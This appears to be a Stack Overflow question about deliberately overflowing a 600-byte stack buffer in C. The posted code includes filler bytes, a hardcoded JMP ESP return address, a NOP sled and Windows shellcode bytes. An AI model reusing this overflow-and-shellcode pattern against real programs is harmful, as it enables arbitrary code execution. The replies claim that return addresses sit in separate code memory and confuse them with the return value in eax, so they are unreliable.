# Overwrite return address in C (buffer overflow)

Tags: c, buffer, buffer-overflow

I'm trying to create buffer overflow example in C.
I have a value buffer, that I try to overflow, so the return address gets changed to an address that contains a "JMP ESP" instruction.

```
#include <stdio.h>
#include <stdlib.h>

int foo(char *);
#define TRASH 0x41
#define RET 0x75222ACE

int main(int argc, char *argv[])
{
    if (argc != 1)
        return printf("Supply an argument, dude\n");
    foo(argv[0]);
    return 0;
}
char shellcode[] =
"\xEB\x02\xEB\x05\xE8\xF9\xFF\xFF\xFF\x5B\x33\xC9\x83\xC3"
"\x35\x88\x0B\x83\xEB\x06\x53\xB8\xCF\x05\x35\x79\xFF\xD0"
"\x33\xC9\x51\x53\x53\x51\x05\x11\x11\x11\x11\x2D\x79\x90"
"\x0E\x11\xFF\xD0\x33\xC9\x51\xB8\x1A\xE0\x34\x79\xFF\xD0"
"\x75\x73\x65\x72\x33\x32\x61";

int foo(char *input)
{
    unsigned char buffer[600] = "";

    /*__BUFFER OVERFLOW TEST*/
    int i;
    char buf[700];
    char *ptr = buf;

    memset(buf, 0, sizeof(buf));
    for (i = 0; i<612; i++)
        (*ptr++) = TRASH;                     //620 bytes of chunk

    *(unsigned long *)&buf[610] = RET;   //then return address = jmp esp, call esp
    strcat(buf, "\x90\x90\x90\x90");     //small NOP sledge
    strcat(buf, shellcode);              //and our first shellcode
    /*__BUFFER OVERFLOW TEST*/


    /*__NORMAL BUFFER FILL TEST*/
    char *test = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";

    //  strcpy(buffer, test);  --> works ok
    strcpy(buffer, buf);

    return 0;
}
```

If I fill the buffer normally (with the letters a), I see the following in the memory:
[image: Buffer//Unknown Values//Return adress]

When I overflow the buffer in order to try to overwrite the return address (with 0x75222ACE) , I get the error message "Stack around the variable 'buffer' was corrupted". I think this has something to do with the fact that I overwrite the "Unknown values".

Does anybody know what changes I need to make in my code to correctly overwrite the return address?

Comment: You are complaining _undefined behaviour_ behaves underfined. stack overflow is no exploit support-site.

Comment: you probably can't do it. return statement is in code memory and buffers in data memory. return is a code, not a variable in the same memory space as buffer. See vonNeuman and Harvard architectures. Some architectures allow messing code space with memory space, but certainly not in modern computers. Because of the fact, that you hardcoded return 0, then probably 0 is in the code segment not data segment.

Comment: also look at the code generated xor of the same values always gives 0 and AFAIK eax often used as return register.

Answer (score 0):

So, the problem is as mentioned by @Olaf, that what you're doing is undefined behavior. It means, that you cannot predict it's behavior and it can behave differently on different architectures,platforms etc.

Usually eax register is used as a return value. As you can see just under return statement there is xor eax,eax. This operation always gives 0. It's compiler's optimalization trick. Reading values from register is much faster than reading your hardcoded 0 from program memory, and result of both is the same. This way you will never be able to overwrite it. Data memory space is not connected to the code memory space, which is very good thing generally. you can return some kind of variable and disable optimizations if you want, but generally I can't see any reason for doing things like this in application